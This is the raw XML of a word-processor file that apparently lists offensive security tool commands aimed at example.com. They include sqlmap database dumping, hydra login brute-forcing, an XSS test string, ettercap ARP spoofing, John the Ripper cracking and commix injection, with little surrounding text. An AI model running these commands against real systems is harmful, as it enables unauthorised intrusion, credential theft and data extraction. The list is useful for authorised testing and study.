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FCD0" w14:textId="271D6289" w:rsidR="00F33FB2" w:rsidRDefault="00D95268" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>a query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D59E1C2" w14:textId="6C36ADF5" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BC9215" w14:textId="7A2E099F" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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 xml:space="preserve">sqlmap -u "http://example.com/vulnerable_input" </w:t>
      </w:r>
      <w:r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>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB0238" w14:textId="53342421" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125ADA23" w14:textId="43B9040C" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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Inputting &lt;script&gt;alert('Hacked!');&lt;/script&gt; into a comment section to see if it executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD2B49" w14:textId="5ED24AB6" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74810776" w14:textId="1310ECDE" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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hydra -l admin -P wordlist.txt example.com http-post-form "/login.php:username=^USER^&amp;password=^PASS^:F=incorrect"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5BBFE4" w14:textId="59DD4CFE" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19DF8AD6" w14:textId="7558F94B" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>sqlmap -u &lt;target_url&gt; [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71609DB1" w14:textId="228E7B6D" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F21BC45" w14:textId="2981A5EB" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u "http://example.com/search.php?id=1" </w:t>
      </w:r>
      <w:r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>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54224E90" w14:textId="6DC6E044" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01967DE1" w14:textId="60AC55E3" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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sqlmap -u "http://example.com/search.php?id=1" -D database_name -T table_name </w:t>
      </w:r>
      <w:r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>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14601DB0" w14:textId="4E67E059" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02168BFB" w14:textId="3604C0E6" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F69118B" w14:textId="1FD0284B" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>ettercap -T -i eth0 -M arp:remote /target1_IP/ /target2_IP/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA67C2C" w14:textId="00F65CEF" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DA8B83" w14:textId="77777777" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00AB41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hydra -L userlist.txt -P passlist.txt example.com http-post-form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5326FEC6" w14:textId="77777777" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00AB41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"/login.php:username=^USER^&amp;password=^PASS^:F=Incorrect"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0657F21A" w14:textId="77BB3BA6" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EC3F2C" w14:textId="56405C2A" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1CA7A6" w14:textId="1A636038" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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nmap --script http-vuln* -p 80,443 example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716F0E72" w14:textId="4C8A1DE7" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69AA15BC" w14:textId="3D10BFF0" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A03094" w14:textId="5509E940" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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 xml:space="preserve">nikto -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="007C021E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>http://example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58C4F957" w14:textId="5D4FBD17" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57161470" w14:textId="0BF6EA91" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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lastRenderedPageBreak/>
        <w:t xml:space="preserve">wpscan --url </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="007C021E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>http://example.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="781D0243" w14:textId="2068E5CB" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73446580" w14:textId="57BABF2A" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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msfconsole use exploit/multi/http/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32448972" w14:textId="0A59B66E" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB84F89" w14:textId="2B688E14" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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hydra -l admin -P /path/to/wordlist.txt example.com http-post-form "/login:username=^USER^&amp;password=^PASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>^: F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>=incorrect"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08A1C7" w14:textId="053310A2" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1311D951" w14:textId="7ABC4AB0" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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john --wordlist=/path/to/wordlist.txt /path/to/hashfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A28AB" w14:textId="6346DCCB" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30914C30" w14:textId="1FAE5C3E" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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beef-xss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F156DF8" w14:textId="7428ACD1" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577AB327" w14:textId="4117C4E2" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268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sqlmap -u "http://example.com/page?parameter=value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8ED70" w14:textId="4DE9CBA3" w:rsidR="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D35FFEA" w14:textId="25379ADD" w:rsidR="00AB419B" w:rsidRPr="00AB419B" w:rsidRDefault="00AB419B" w:rsidP="00D95268">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>commix -u "http://example.com/page?parameter=value"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AB419B" w:rsidRPr="00AB419B" w:rsidSect="00657E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68"/>
    <w:rsid w:val="005415EA"/>
    <w:rsid w:val="005F23E0"/>
    <w:rsid w:val="00657E0B"/>
    <w:rsid w:val="008B0D5F"/>
    <w:rsid w:val="00AB419B"/>
    <w:rsid w:val="00D9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FC8EB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{701B20CE-0660-45A9-A4B4-ACBFCC3D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1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4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xample.com" TargetMode="External"/><Relationship Id="rId4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reda</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>eman reda</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-22T17:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-22T18:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>